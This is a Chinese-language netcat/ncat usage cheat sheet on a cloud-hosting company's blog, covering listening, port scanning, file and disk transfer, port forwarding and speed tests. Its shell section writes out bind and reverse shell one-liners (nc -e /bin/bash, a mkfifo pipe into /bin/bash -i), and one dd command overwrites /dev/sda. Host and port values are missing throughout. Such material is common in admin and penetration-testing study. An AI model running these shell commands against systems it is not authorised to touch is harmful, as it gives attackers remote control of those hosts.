ncat使用汇总-创新互联
这篇文章主要为大家详细介绍了ncat使用的方法,文中示例代码介绍的非常详细,图文详解容易学习,非常适合初学者入门
目前创新互联公司已为1000+的企业提供了网站建设、域名、虚拟空间、网站运营、企业网站设计、吉木萨尔网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。功能
1. 监听本地端口
2. 连接目标端口
3. 传送文件
4. Remote Administration with Netcat(OSCP中给的分类,不知道此分类的作用,需要深入学习)
5. 反弹shell
6. 测两台机器间的网速
监听本地端口
# 临时监听端口
nc -l # 临时监听TCP端口一次
nc -lu # 临时监听UDP端口
# 以监听TCP端口为例,监听UDP端口基本一样
服务器端临时 监听端口
客户端尝试连接服务器端
建立TCP连接
客户端断开连接时,服务器端也关闭端口的监听
nc -lk #永久监听TCP端口
nc -lku #永久监听UDP端口
# 永久监听:监听端口,并且客户端端来连接时,服务器端依旧监听等待连接;并且支持多客户端同时连接。UDP端口类似。
连接目标端口
# 在监听部分可以找到连接的图,接下来重点操作一下端口扫描;nc扫描端口会创建TCP三次握手连接,会造成一定的流量,容易被发现。
nc # 连接目标TCP端口
nc -u # 连接目标UDP端口
# 使用上述命令连接tcp或UDP端口,连接成功后会阻塞在用户输入中,让用户与目标端口进行交互。此外还有一种非交互模式,适合用来扫描端口。
nc -z #扫描目标TCP端口
nc -zu # 扫描目标UDP端口
# -w参数的适用场景:扫描UDP端口;网络状况不好。在网络状况良好是,扫描TCP端口没有必要使用此参数。
nc -z -w1 range
传送文件
此部分需要两台机器的配合
A机:数据存储机器
B机:备份机器
TCP传送文件
B: nc -l > filename
A: nc < filename
文件传送完成后,连接自动断开
UDP传送文件
#B
nc -lu > filename
#A
nc -u < filename
# 文件传输完成后,连接不会断开,可反复连接B机进行文件传输。
# UDP更适合做一个日志接受端,其他的机器都把通过nc把日志写入到监听的UDP机器上
传送目录
# 传送目录与传送文件是一样的,只是通过tar将目录打包为压缩文件传过去并自定tar解包,实现传送目录的功能
#B
nc -l | tar zxvf -
#A
tar zcf - * | nc
传送分区
B: nc -l | dd of=/dev/sda
A: dd if=/dev/sda | nc
反弹shell
# nc有-e选项时
#server
nc -l -e /bin/bash -i
#client
nc
# nc没有-e选项时,创建正向shell
#server
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l > /tmp/fifo
#client
nc
# 创建反向shell(服务器端连接客户端,然后受客户端控制)
#client:
nc
#server:
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc > /tmp/fifo && rm -rf /tmp/fifo
端口转发
# server
nc -l
mkfifo /tmp/fifo && cat /tmp/fifo | nc localhost | nc -l > /tmp/fifo
# client
nc -n
测机器间网速
A: nc -l
>/dev/null B: nc < /dev/zero
A、B:watch -n 1 "/sbin/ifconfig
| grep bytes"
本文在介绍关于ncat使用的基础上,重点探讨了其具体步骤,本文内容紧凑,希望大家可以有所收获。如果想了解更多,欢迎关注创新互联行业资讯频道!
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
文章名称:ncat使用汇总-创新互联
浏览路径:http://lswzjz.com/article/csogdo.html